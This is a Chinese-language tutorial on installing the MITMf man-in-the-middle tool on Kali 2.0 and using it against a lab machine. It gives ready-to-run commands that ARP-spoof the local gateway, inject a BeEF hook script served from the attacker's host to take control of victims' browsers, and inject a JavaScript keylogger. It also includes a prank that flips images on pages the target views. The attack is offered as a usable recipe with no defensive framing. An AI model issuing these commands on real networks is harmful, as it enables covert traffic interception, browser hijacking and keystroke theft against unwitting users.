mitmf 中间人攻击简单演示

mitmf 是一款用来进行中间人攻击的工具，它可以结合 BeEF 一起来使用，并利用 BeEF强大的 hook 脚本来控制目标客户端。

下面让我们一起看看如何在 Kali2.0上安装与使用 mitmf 。mitmf默认在Kali2.0上并未安装，在之前的版本有安装。

Kali2.0下直接安装也行，阅读到这里可以直接跳到图（apt-get install mitmf）

 

本地环境：Windows xp、IE6、kali2.0

 

首先，我们先进行工具依赖包的安装。打开 terminal 终端，输入如下命令:

apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file

以上结果出现一些安装包无法安装的情况，这里我们无需理会，继续我们的下一步操作即可。

依赖包安装完成后，就可以开始安装mitmf 了、输入命令:

apt-get install mitmf

不过这样安装完成后 mitmf 依然无法正常使用它的一些功能，因为缺少了 twisted 的版本兼容性。我们来安装适合 mitmf 的 twisted 。如果你已经安装过，那么先卸载之前的版本。输入命令如下:

pip uninstall twisted

并用 wget 命令进行下载。

wget http://twistedmatrix.com/Releases/Twisted/15.5/Twisted-15.5.0.tar.bz2

安装 twisted 。

pip install ./Twisted-15.5.0.tar.bz2

这样，我们就可以正常使用 mitmf 了。

下面让我们运行 BeEF来调用 BeEF强大的 hook 脚本。首先我们进入BeEF目录并启动它。

cd /usr/share/beef-xss

./beef

BeEF的使用可以参考其他资料，这里就不多写了。

好了，接下来 正式安装，输入以下命令：

我们在浏览器打开UI界面后，下面我们就用 mitmf 进行中间人攻击。输入如下命令:

mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.100 --inject --js-url http://192.168.15.131:3000/hook.js

这条命令的原理是，利用ARP进行地址欺骗，让局域网中的其他电脑，误认为Kali为网关路由。当目标机器打开浏览器，就会被注入 hook 脚本，之后便可在BeEF上进行客户端的控制。

mitmf不仅能和BeEF来结合使用，自身还有许多强大的功能。例如软件自带的键盘记录功能，输入命令:

mitmf –spoof –arp -i eth0 –gateway 192.168.1.1 –target 192.168.1.100–jskeylogger

最后，在介绍个mitmf 一个有趣的恶搞功能。它可以使目标浏览网页时，所有的图片都倒转 180度。是不是很有意思！

mitmf –spoof –arp -i eth0 –gateway 192.168.1.1 –target 192.168.1.100 –upsidedownternet

 

更多关于此工具的使用，可以参考相关手册与文章，这里只是做个入门的介绍。

 

参考资料：

http://www.secist.com/archives/1056.html

https://github.com/byt3bl33d3r/MITMf

http://www.freebuf.com/sectool/45796.html